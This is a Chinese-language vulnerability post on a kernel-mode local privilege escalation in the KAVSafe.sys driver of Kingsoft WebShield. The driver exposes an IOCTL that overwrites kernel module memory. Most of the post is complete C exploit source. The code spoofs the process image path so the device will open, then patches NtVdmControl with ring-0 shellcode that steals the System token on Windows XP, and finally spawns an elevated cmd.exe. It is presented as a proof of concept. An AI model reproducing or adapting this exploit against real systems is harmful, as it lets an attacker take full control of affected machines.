KAVSafe.sys<=2010.4.14.609(2010.5.23)内核本地提权漏洞及利用代码

[tag]kingsoft[/tag]

Kingsoft WebShield KAVSafe.sys <= 2010.4.14.609(2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability 漏洞产品 金山网盾<= 3.5.1.2 (2010.5.23) 数字签名: 2010-5-23 2:33:54 KAVSafe.sys <= 2010.4.14.609 数字签名：2010-4-14 13:42:26 细节: Kavsafe.sys 创建一个名为\Device\KAVSafe的设备，并接受0x830020d4号控制码，该控制码可以复写任意内核模块的内存 利用代码:(XP ONLY) 代码: #define IOCTL_HOTPATCH_KERNEL_MODULE CTL_CODE(0x8300 , 0x835 , METHOD_BUFFERED ,FILE_ANY_ACCESS) typedef LONG (WINAPI *PNT_QUERY_INFORMATION_PROCESS)( HANDLE ProcessHandle, DWORD ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength ); typedef struct _STRING { USHORT Length; USHORT MaximumLength; PCHAR Buffer; } STRING; typedef STRING *PSTRING; typedef struct _RTL_DRIVE_LETTER_CURDIR { USHORT Flags; USHORT Length; ULONG TimeStamp; STRING DosPath; } RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING; typedef UNICODE_STRING *PUNICODE_STRING; typedef const UNICODE_STRING *PCUNICODE_STRING; #define RTL_MAX_DRIVE_LETTERS 32 #define RTL_DRIVE_LETTER_VALID (USHORT)0x0001 typedef struct _CURDIR { UNICODE_STRING DosPath; HANDLE Handle; } CURDIR, *PCURDIR; typedef struct _RTL_USER_PROCESS_PARAMETERS { ULONG MaximumLength; ULONG Length; ULONG Flags; ULONG DebugFlags; HANDLE ConsoleHandle; ULONG ConsoleFlags; HANDLE StandardInput; HANDLE StandardOutput; HANDLE StandardError; CURDIR CurrentDirectory; // ProcessParameters UNICODE_STRING DllPath; // ProcessParameters UNICODE_STRING ImagePathName; // ProcessParameters UNICODE_STRING CommandLine; // ProcessParameters PVOID Environment; // NtAllocateVirtualMemory ULONG StartingX; ULONG StartingY; ULONG CountX; ULONG CountY; ULONG CountCharsX; ULONG CountCharsY; ULONG FillAttribute; ULONG WindowFlags; ULONG ShowWindowFlags; UNICODE_STRING WindowTitle; // ProcessParameters UNICODE_STRING DesktopInfo; // ProcessParameters UNICODE_STRING ShellInfo; // ProcessParameters UNICODE_STRING RuntimeData; // ProcessParameters RTL_DRIVE_LETTER_CURDIR CurrentDirectores[ RTL_MAX_DRIVE_LETTERS ]; } RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; typedef struct _PEB { BOOLEAN InheritedAddressSpace; // These four fields cannot change unless the BOOLEAN ReadImageFileExecOptions; // BOOLEAN BeingDebugged; // BOOLEAN SpareBool; // HANDLE Mutant; // INITIAL_PEB structure is also updated. PVOID ImageBaseAddress; PVOID Ldr; struct _RTL_USER_PROCESS_PARAMETERS *ProcessParameters; } PEB, *PPEB; typedef LONG KPRIORITY; typedef struct _PROCESS_BASIC_INFORMATION { LONG ExitStatus; PVOID PebBaseAddress; ULONG_PTR AffinityMask; KPRIORITY BasePriority; ULONG_PTR UniqueProcessId; ULONG_PTR InheritedFromUniqueProcessId; } PROCESS_BASIC_INFORMATION,*PPROCESS_BASIC_INFORMATION; typedef struct { ULONG Unknown1; ULONG Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } X_SYSTEM_MODULE_INFORMATION, *PX_SYSTEM_MODULE_INFORMATION; typedef LONG (WINAPI *PNT_QUERY_SYSTEM_INFORMATION) ( LONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 ) typedef LONG (WINAPI *PNT_VDM_CONTROL) ( ULONG Service, PVOID ServiceData ); VOID __declspec(naked) R0ShellCodeXP() { __asm { mov eax,0xffdff124 mov eax,[eax] mov esi ,dword ptr[eax+0x220] mov eax,esi searchxp: mov eax,dword ptr[eax+0x88] sub eax,0x88 mov edx,dword ptr[eax+0x84] cmp edx,4 jnz searchxp mov eax,dword ptr[eax+0xc8] mov dword ptr[esi + 0xc8] , eax ret 8 } } VOID NopNop() { printf("nop!\n"); } #include "malloc.h" int main(int argc, char* argv[]) { printf("KSWebShield KAVSafe.sys <= 2010,04,14,609\n" "Kernel Mode Privilege Escalation Vulnerability Proof-of-Concept\n" "2010-5-23\n" "By Lincoin \n\nPress Enter"); HKEY hkey ; WCHAR InstallPath[MAX_PATH]; DWORD datatype ; DWORD datasize = MAX_PATH * sizeof(WCHAR); ULONG oldlen ; PVOID pOldBufferData = NULL ; if (RegOpenKey(HKEY_LOCAL_MACHINE , "SOFTWARE\\Kingsoft\\KSWSVC", &hkey) == ERROR_SUCCESS) { if (RegQueryValueExW(hkey , L"ProgramPath" , NULL , &datatype , (LPBYTE)InstallPath , &datasize) != ERROR_SUCCESS) { RegCloseKey(hkey); printf("KSWebShield not installed\n"); getchar(); return 0 ; } RegCloseKey(hkey); } else { printf("KSWebShield not installed\n"); getchar(); return 0 ; } wcscat(InstallPath , L"\\kavinst.exe"); PROCESS_BASIC_INFORMATION pbi ; PNT_QUERY_INFORMATION_PROCESS pNtQueryInformationProcess ; pNtQueryInformationProcess = (PNT_QUERY_INFORMATION_PROCESS)GetProcAddress(GetModuleHandle("ntdll.dll" ) , "NtQueryInformationProcess"); pNtQueryInformationProcess(NtCurrentProcess() , 0 , &pbi , sizeof(pbi) , NULL); PPEB peb ; peb = (PPEB)pbi.PebBaseAddress; oldlen = peb->ProcessParameters->ImagePathName.Length;
peb->ProcessParameters->ImagePathName.Length = wcslen(InstallPath) * sizeof(WCHAR);
pOldBufferData = malloc(peb->ProcessParameters->ImagePathName.Length);
RtlCopyMemory(pOldBufferData,peb->ProcessParameters->ImagePathName.Buffer , peb->ProcessParameters->ImagePathName.Length);
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , InstallPath ,peb->ProcessParameters->ImagePathName.Length );
HANDLE hdev = CreateFile("\\\\.\\KAVSafe" ,
FILE_READ_ATTRIBUTES ,
FILE_SHARE_READ ,
0,
OPEN_EXISTING ,
0,
0);

if (hdev==INVALID_HANDLE_VALUE)
{
printf("cannot open device %u\n", GetLastError());
getchar();
return 0 ;
}
RtlCopyMemory(peb->ProcessParameters->ImagePathName.Buffer , pOldBufferData,peb->ProcessParameters->ImagePathName.Length);
peb->ProcessParameters->ImagePathName.Length = (USHORT)oldlen ;

PNT_QUERY_SYSTEM_INFORMATION pNtQuerySystemInformation ;
pNtQuerySystemInformation = (PNT_QUERY_SYSTEM_INFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtQuerySystemInformation");
X_SYSTEM_MODULE_INFORMATION sysmod ;
HMODULE KernelHandle ;

pNtQuerySystemInformation(0xb, &sysmod, sizeof(sysmod), NULL);

KernelHandle = LoadLibrary(strrchr(sysmod.Module[0].ImageName, '\\') + 1);

if (KernelHandle == 0 )
{
printf("cannot load ntoskrnl!\n");
getchar();
return 0 ;
}
PVOID pNtVdmControl = GetProcAddress(KernelHandle , "NtVdmControl");

if (pNtVdmControl == 0 )
{
printf("cannot find NtVdmControl!\n");
getchar();
return 0 ;
}
pNtVdmControl = (PVOID)((ULONG)pNtVdmControl - (ULONG)KernelHandle );

printf("NtVdmControl = %08x" , pNtVdmControl );

getchar();
ULONG ShellCodeSize = (ULONG)NopNop - (ULONG)R0ShellCodeXP;
ULONG pShellCode = (ULONG)R0ShellCodeXP;

PVOID Data = malloc(0x48 + ShellCodeSize);

CopyMemory((PVOID)((ULONG)Data + 0x48) , R0ShellCodeXP , ShellCodeSize);

CHAR ModuleName[68]= "ntoskrnl.exe" ;
RtlCopyMemory( Data , ModuleName , sizeof(ModuleName));
*(ULONG*)((ULONG)Data + 64) = (ULONG)pNtVdmControl;
*(ULONG*)((ULONG)Data + 68) = ShellCodeSize ;

ULONG btr ;
if (!DeviceIoControl(hdev ,
IOCTL_HOTPATCH_KERNEL_MODULE ,
Data ,
0x48 + ShellCodeSize ,
NULL ,
0,
&btr , 0
))
{
printf("cannot device io control!%u\n" , GetLastError());
getchar();
return 0;
}

CloseHandle(hdev);

PNT_VDM_CONTROL pR3NtVdmControl = (PNT_VDM_CONTROL)GetProcAddress(GetModuleHandle("ntdll.dll") , "NtVdmControl");
pR3NtVdmControl(0,0);

WinExec("cmd.exe" , SW_SHOW);
printf("OK!\n ");

getchar();

return 0;

}